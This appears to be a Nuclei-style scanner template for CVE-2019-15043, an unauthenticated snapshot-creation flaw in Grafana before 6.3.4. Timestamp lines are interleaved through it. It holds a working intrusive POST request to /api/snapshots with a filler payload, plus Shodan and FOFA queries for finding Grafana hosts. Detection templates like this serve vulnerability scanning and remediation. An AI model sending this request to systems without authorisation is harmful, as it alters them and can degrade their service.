2022-12-08 00:37:16 +00:00
id : CVE-2019-15043
info :
2023-04-12 18:12:24 +00:00
name : Grafana - Improper Access Control
2022-12-08 00:37:16 +00:00
author : Joshua Rogers
severity : high
2022-12-08 05:24:11 +00:00
description : |
2023-04-12 18:12:24 +00:00
Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
2023-09-06 12:53:28 +00:00
remediation : Upgrade to 6.3.4 or higher.
2022-12-08 00:37:16 +00:00
reference :
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- https://bugzilla.redhat.com/show_bug.cgi?id=1746945
2023-03-30 10:14:58 +00:00
- https://aaron-hoffmann.com/posts/cve-2019-15043/
2022-12-08 00:37:16 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043
2023-04-12 18:12:24 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-15043
2022-12-08 00:37:16 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score : 7.5
cve-id : CVE-2019-15043
2023-07-11 19:49:27 +00:00
cwe-id : CWE-306
2024-05-31 19:23:20 +00:00
epss-score : 0.28071
epss-percentile : 0.96836
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
2022-12-08 00:37:16 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:53:28 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : grafana
product : grafana
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"Grafana"
- cpe:"cpe:2.3:a:grafana:grafana"
- http.title:"grafana"
fofa-query :
- title="grafana"
- app="grafana"
2024-05-31 19:23:20 +00:00
google-query : intitle:"grafana"
2023-03-30 10:14:58 +00:00
tags : cve,cve2019,grafana,dos,intrusive
variables :
payload : '{{repeat("A", 4000)}}'
2022-12-08 00:37:16 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-12-08 00:37:16 +00:00
- method : POST
path :
- "{{BaseURL}}/api/snapshots"
2023-07-11 19:49:27 +00:00
2023-03-30 10:14:58 +00:00
body : '{"dashboard": {"name":"{{payload}}"}}'
2022-12-08 00:37:16 +00:00
2023-07-11 19:49:27 +00:00
headers :
Content-Type : "application/json"
2022-12-08 00:37:16 +00:00
matchers-condition : and
matchers :
- type : word
2023-03-30 10:14:58 +00:00
part : body
2022-12-08 00:37:16 +00:00
words :
2023-03-30 10:14:58 +00:00
- '"deleteUrl":'
- '"deleteKey":'
- '"key":'
- '"url":'
2022-12-08 00:37:16 +00:00
condition : and
2022-12-08 05:24:11 +00:00
2023-03-30 10:14:58 +00:00
- type : word
part : header
words :
- "application/json"
2022-12-08 05:24:11 +00:00
- type : status
status :
2023-04-12 18:12:24 +00:00
- 200
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100817ecde20d9a1e4f370fe64af96c8819fff7466563ede82546a22586faaf71770221008c38eecd5b26dbe752f9c46e370115b4a0379641320e31ce0e7e019083e576d3:922c64590222798bb761d5b6d8e72950